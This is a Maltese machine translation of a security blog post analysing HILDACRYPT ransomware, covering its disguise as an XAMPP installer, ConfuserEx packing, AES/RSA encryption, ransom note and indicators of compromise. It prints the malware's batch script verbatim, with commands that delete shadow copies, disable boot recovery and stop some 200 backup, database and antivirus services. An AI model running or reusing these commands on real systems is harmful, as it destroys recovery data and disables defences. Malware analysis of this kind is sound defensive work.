Hello, Habr! Għal darb'oħra, qed nitkellmu dwar l-aħħar verżjonijiet ta 'malware mill-kategorija Ransomware. HILDACRYPT huwa ransomware ġdid, membru tal-familja Hilda skopert f'Awwissu 2019, imsejjaħ wara l-kartun Netflix li ntuża biex jitqassam is-softwer. Illum qed inkunu familjari mal-karatteristiċi tekniċi ta 'dan il-virus ransomware aġġornat.
Fl-ewwel verżjoni ta 'Hilda ransomware, link għal wieħed stazzjonat fuq Youtube serje tal-kartuns kienet tinsab fl-ittra tal-fidwa. HILDACRYPT jaħbat bħala installatur leġittimu ta 'XAMPP, distribuzzjoni Apache faċli biex tinstalla li tinkludi MariaDB, PHP, u Perl. Fl-istess ħin, il-cryptolocker għandu isem ta 'fajl differenti - xamp. Barra minn hekk, il-fajl ransomware m'għandux firma elettronika.
Analiżi statika
Ir-ransomware jinsab f'fajl PE32 .NET miktub għal MS WindowsId-daqs tiegħu huwa ta' 135,168 byte. Kemm il-kodiċi ewlieni tal-programm kif ukoll il-kodiċi tad-difensur huma miktuba f'C#. Skont id-data u l-ħin tal-kumpilazzjoni, il-fajl binarju nħoloq fl-14 ta' Settembru 2019.
Skont Detect It Easy, ir-ransomware huwa arkivjat bl-użu ta 'Confuser u ConfuserEx, iżda dawn l-obfuscators huma l-istess bħal qabel, ConfuserEx biss huwa s-suċċessur ta' Confuser, għalhekk il-firem tal-kodiċi tagħhom huma simili.
HILDACRYPT huwa tabilħaqq ippakkjat ma 'ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vettur tal-attakk
Probabbilment, ir-ransomware ġie skopert fuq wieħed mis-siti tal-ipprogrammar tal-web, maskaring bħala programm XAMPP leġittimu.
Il-katina kollha ta 'infezzjoni tista' tidher fi .
Offuskazzjoni
Il-kordi tar-ransomware huma maħżuna f'forma kriptata. Meta titnieda, HILDACRYPT jiddeċifrahom billi juża Base64 u AES-256-CBC.
Installazzjoni
L-ewwelnett, ir-ransomware joħloq folder f'%AppDataRoaming% li fih il-parametru GUID (Identifikatur Uniku Globalment) huwa ġġenerat b'mod każwali. Billi żżid fajl BAT f'dan il-post, il-virus ransomware iniedih billi juża cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & exit
Imbagħad jibda tesegwixxi script tal-lott biex tiddiżattiva l-karatteristiċi jew is-servizzi tas-sistema.
L-iskrittura fih lista twila ta 'kmandi li jeqirdu kopji shadow, jiskonnettja s-server SQL, backup u soluzzjonijiet antivirus.
Pereżempju, tipprova twaqqaf is-servizzi ta' Acronis Backup mingħajr suċċess. Barra minn hekk, jattakka sistemi ta 'backup u soluzzjonijiet antivirus mill-bejjiegħa li ġejjin: Veeam, Sophos, Kaspersky, McAfee u oħrajn.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Ladarba s-servizzi u l-proċessi msemmija hawn fuq huma diżattivati, il-cryptolocker jiġbor informazzjoni dwar il-proċessi kollha li qed jaħdmu billi juża l-kmand tal-lista tat-task biex jiżgura li s-servizzi kollha meħtieġa huma mwaqqfa.
tasklist v/fo csv
Dan il-kmand juri lista dettaljata ta 'proċessi li qed jaħdmu, li l-elementi tagħhom huma separati bis-sinjal ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Wara din il-verifika, ir-ransomware jibda l-proċess tal-kriptaġġ.
Kriptaġġ
Encryption tal-fajls
HILDACRYPT jgħaddi mill-kontenut kollu misjub tal-hard drives, ħlief għall-folders Recycle.Bin u Reference AssembliesMicrosoft. Dan tal-aħħar fih fajls kritiċi dll, pdb, eċċ għal applikazzjonijiet .Net li jistgħu jaffettwaw l-operat tar-ransomware. Biex tfittex fajls li se jiġu encrypted, tintuża l-lista li ġejja ta’ estensjonijiet:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ir-ransomware juża l-algoritmu AES-256-CBC biex jikkripta l-fajls tal-utent. Id-daqs taċ-ċavetta huwa 256 bit u d-daqs tal-vettur tal-inizjalizzazzjoni (IV) huwa 16-il bytes.
Fil-screenshot li ġej, il-valuri ta 'byte_2 u byte_1 inkisbu b'mod każwali bl-użu ta' GetBytes().
Ewlenin
VI
Il-fajl encrypted għandu l-estensjoni HCY!.. Dan huwa eżempju ta' fajl encrypted. Iċ-ċavetta u l-IV imsemmija hawn fuq inħolqu għal dan il-fajl.
Kriptaġġ taċ-ċavetta
Il-cryptolocker jaħżen iċ-ċavetta AES ġġenerata f'fajl encrypted. L-ewwel parti tal-fajl ikkodifikat għandha header li fih data bħal HILDACRYPT, KEY, IV, FileLen f'format XML, u tidher bħal din:
Il-kriptaġġ taċ-ċavetta AES u IV isir bl-użu ta 'RSA-2048, u l-kodifikazzjoni ssir bl-użu ta' Base64. Iċ-ċavetta pubblika RSA hija maħżuna fil-korp tal-cryptlocker f'waħda mill-istrings encrypted f'format XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Ċavetta pubblika RSA tintuża biex tikkodifika ċ-ċavetta tal-fajl AES. Iċ-ċavetta pubblika RSA hija kodifikata Base64 u tikkonsisti f'modulu u esponent pubbliku ta '65537. Id-deċifrar jeħtieġ iċ-ċavetta privata RSA, li għandu l-attakkant.
Wara l-kriptaġġ RSA, iċ-ċavetta AES hija kodifikata bl-użu ta 'Base64 maħżuna fil-fajl encrypted.
Messaġġ ta’ fidwa
Ladarba l-encryption titlesta, HILDACRYPT jikteb il-fajl html fil-folder li fih ikkodifika l-fajls. In-notifika tar-ransomware fiha żewġ indirizzi tal-email fejn il-vittma tista’ tikkuntattja lill-attakkant.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net
L-avviż ta 'estorsjoni fih ukoll il-linja "L-ebda loli huwa sigur;)" - referenza għal karattri Anime u manga bid-dehra ta' tfajliet żgħar ipprojbiti fil-Ġappun.
Output
HILDACRYPT, familja ġdida ta’ ransomware, ħarġet verżjoni ġdida. Il-mudell ta 'kodifikazzjoni jipprevjeni lill-vittma milli jiddeċifra fajls encrypted mir-ransomware. Cryptolocker juża metodi ta 'protezzjoni attiva biex jiskonnettja servizzi ta' protezzjoni relatati ma 'sistemi ta' backup u soluzzjonijiet antivirus. L-awtur ta 'HILDACRYPT huwa fan tas-serje animata Hilda, murija fuq Netflix, li l-link għall-karru tagħha kienet tinsab fl-ittra ta' xiri għall-verżjoni preċedenti tal-programm.
Bhas-soltu, и jistgħu jipproteġu l-kompjuter tiegħek minn ransomware HILDACRYPT, u l-fornituri għandhom il-kapaċità li jipproteġu lill-klijenti tagħhom b' . Il-protezzjoni hija żgurata mill-fatt li dawn is-soluzzjonijiet jinkludu jinkludi mhux biss backup, iżda wkoll is-sistema ta 'sigurtà integrata tagħna - Imħaddma minn mudell ta' tagħlim bil-magni u bbażata fuq euristiċi tal-imġieba, teknoloġija li hija kapaċi tiġġieled it-theddida ta' ransomware zero-day bħall-ebda oħra.
Indikaturi ta' kompromess
Estensjoni tal-fajl HCY!
HILDACRYPTReadMe.html
xamp.exe b'ittra waħda "p" u l-ebda firma diġitali
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Sors: www.habr.com
